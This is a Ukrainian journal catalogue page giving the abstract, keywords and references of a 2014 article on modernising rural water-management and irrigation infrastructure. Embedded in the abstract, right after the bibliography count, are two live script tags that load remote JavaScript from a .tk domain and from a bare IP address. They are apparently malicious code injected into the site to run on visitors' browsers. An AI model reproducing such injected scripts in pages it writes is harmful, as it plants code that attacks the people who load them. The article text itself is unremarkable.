ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.152
Розвиток сільських територій і соціальна сфера села

Модернізація водогосподарської інфраструктури як фактор прискорення соціально-економічного піднесення сільських територій / Хвесик М.А., Голян В. А. // Економіка АПК. - 2014. - № 7 - С. 121

Виявлено негативні наслідки економічної кризи 90-х років минулого століття для розвитку водогосподарської інфраструктури сільських територій, зокрема, вплив стагнаційних процесів в аграрному секторі національного господарства на стан міжгосподарських і внутрішньогосподарських мереж гідротехнічних споруд. Обґрунтовується доцільність модернізації водогосподарської інфраструктури сільських територій як важливого чинника відродження потенціалу зрошуваного землеробства та сільськогосподарського виробництва в зоні осушувальних меліорацій. Модернізація водогосподарської інфраструктури сільських територій розглядається як необхідна передумова імплементації директиви Європейського Союзу, що передбачає захист водних об’єктів від забруднення нітратами із сільськогосподарських джерел. Запропоновано нові інституціональні форми інвестиційного забезпечення модернізації гідротехнічних споруд у зоні осушувальних меліорацій (створення стратегічних водогосподарських альянсів і сек’юритизація водогосподарських активів) та систем водопостачання й водовідведення у сільських населених пунктах (створення водних кластерів). Бібліогр.: 13.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: водогосподарська інфраструктура, сільські території, осушувальні меліорації, зрошуване землеробство, водопостачання та водовідведення, модернізація

Список використаних джерел

 1. Вертіль О. «Лікарняний» для колодязя / О. Вертіль // Уряд. кур’єр. – 2012. – №48. – С. 10.
 2. Голян В.А. Інвестиційне забезпечення сфери водокористування: інституціональне підґрунтя та галузеві особливості / В.А. Голян, І.І. Андрощук // Економіст. – 2013. – №8. – С. 36-43.
 3. Грановська Л.М. Екологічне страхування ризиків водогосподарської діяльності на меліорованих землях : моногр. / Л.М. Грановська, Р.А. Кисельова. – Херсон: Грінь Д.С., 2012. – 526 с.
 4. Ромащенко М. Наукові засади розвитку меліорації земель в Україні / М. Ромащенко // Водне господарство України. – 2013. – №1. – С. 35-42.
 5. Сташук В. Україна на шляху до басейнового принципу управління водними ресурсами / В. Сташук, А. Яцик // Водне господарство України. – 2007. – №4. – С. 6-10.
 6. Хвесик М. Економічний механізм регулювання водокористування: проблеми та перспективи удосконалення / М. Хвесик // Водне господарство України. – 2012. – №5. – С. 11-16.
 7. Яцик А. Ситуація з водою потребує рішучих дій та ухвалення неординарних рішень / А. Яцик // Уряд. кур’єр. – 2011. – №107. – С. 27.
 8. Яцюк М. Реформування управління водогосподарсько-меліоративним комплексом – оптимізація структури бюджетних водогосподарських організацій / М. Яцюк // Водне господарство України. – 2011. – №4. – С. 6-8.
 9. Vodnyye problemy na rubezhe vekov : sb. Statey / Khublaryan M.G. (editor-in-chief). [Water problems on the verge of the centuries: Collected papers]. Institut vodnykh problem RAN. – Wat. Probl. Inst., Russian Acad. of Sci. Moscow: Nauka, 1999 [in Russian].
 10. Davydov A.V. Organizacija upravlenija vodohozjajstvennoj dejatel'nost'ju v sovremennyh uslovijah [Organization of water management in modern conditions ]. Regionalnaya ekonomika: teoriya i praktika – Reg. Econ.: Theory and Pract., 2009, No 26 (119), pp. 34-37 [in Russian].
 11. Sokolov L.I. Klasternyj podhod k formirovaniju ustojchivogo vodopol'zovanija [The cluster approach to the formation of sustainable water use]. Delovaya slava Rossii – Business glory of Russia, 2008, VI edit., pp. 58-60 [in Russian].
 12. Sysenko V.I. Konceptual'nye osnovy regional'nogo vodopotreblenija [Conceptual bases of regional water consumption]. Problemy regionalnoy ekonomiki – Region. Econ. Probl., 2000, No 3, pp. 41-47 [in Russian].
 13. Adjustment in OECD Agriculture: Reforming Farmland Policies. – Paris, OECD, 1998.
Читати статтю: 14_07_121-126.pdf